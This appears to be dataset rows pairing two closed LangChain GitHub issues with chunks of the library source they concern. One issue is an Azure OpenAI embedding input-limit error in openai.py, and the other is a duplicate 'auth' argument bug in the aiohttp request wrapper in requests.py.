The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
if self.show_progress_bar:
try:
from tqdm.auto import tqdm
_iter = tqdm(range(0, len(tokens), _chunk_size))
except ImportError:
_iter = range(0, len(tokens), _chunk_size)
else:
_iter = range(0, len(tokens), _chunk_size)
for i in _iter: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | response = embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
if self.skip_empty and len(batched_embeddings[i]) == 1:
continue
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = embed_with_retry(
self,
input="",
**self._invocation_params,
)[
"data"
][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
async def _aget_len_safe_embeddings( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
for i in range(0, len(tokens), _chunk_size):
response = await async_embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = (
await async_embed_with_retry(
self,
input="",
**self._invocation_params,
)
)["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist() |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | return embeddings
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
return self._get_len_safe_embeddings(texts, engine=self.deployment)
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
return await self._aget_len_safe_embeddings(texts, engine=self.deployment)
def embed_query(self, text: str) -> List[float]: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more then 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once.
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1 dimentional array and not multi. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | """Call out to OpenAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
return self.embed_documents([text])[0]
async def aembed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embeddings = await self.aembed_documents([text])
return embeddings[0] |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | """Lightweight wrapper around requests library, with async support."""
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator, Dict, Optional
import aiohttp
import requests
from langchain.pydantic_v1 import BaseModel, Extra
class Requests(BaseModel): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | """Wrapper around requests to handle auth and async.
The main purpose of this wrapper is to handle authentication (by saving
headers) and enable easy async methods on the same base object.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
auth: Optional[Any] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
def get(self, url: str, **kwargs: Any) -> requests.Response:
"""GET the URL and return the text."""
return requests.get(url, headers=self.headers, auth=self.auth, **kwargs)
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""POST to the URL and return the text."""
return requests.post(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PATCH the URL and return the text."""
return requests.patch(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PUT the URL and return the text."""
return requests.put(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def delete(self, url: str, **kwargs: Any) -> requests.Response: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | """DELETE the URL and return the text."""
return requests.delete(url, headers=self.headers, auth=self.auth, **kwargs)
@asynccontextmanager
async def _arequest(
self, method: str, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""Make an async request."""
if not self.aiosession:
async with aiohttp.ClientSession() as session:
async with session.request(
method, url, headers=self.headers, auth=self.auth, **kwargs
) as response:
yield response
else:
async with self.aiosession.request(
method, url, headers=self.headers, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def aget(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""GET the URL and return the text asynchronously."""
async with self._arequest("GET", url, auth=self.auth, **kwargs) as response:
yield response
@asynccontextmanager
async def apost( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""POST to the URL and return the text asynchronously."""
async with self._arequest(
"POST", url, json=data, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def apatch(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PATCH the URL and return the text asynchronously."""
async with self._arequest(
"PATCH", url, json=data, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def aput(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PUT the URL and return the text asynchronously."""
async with self._arequest(
"PUT", url, json=data, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def adelete( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
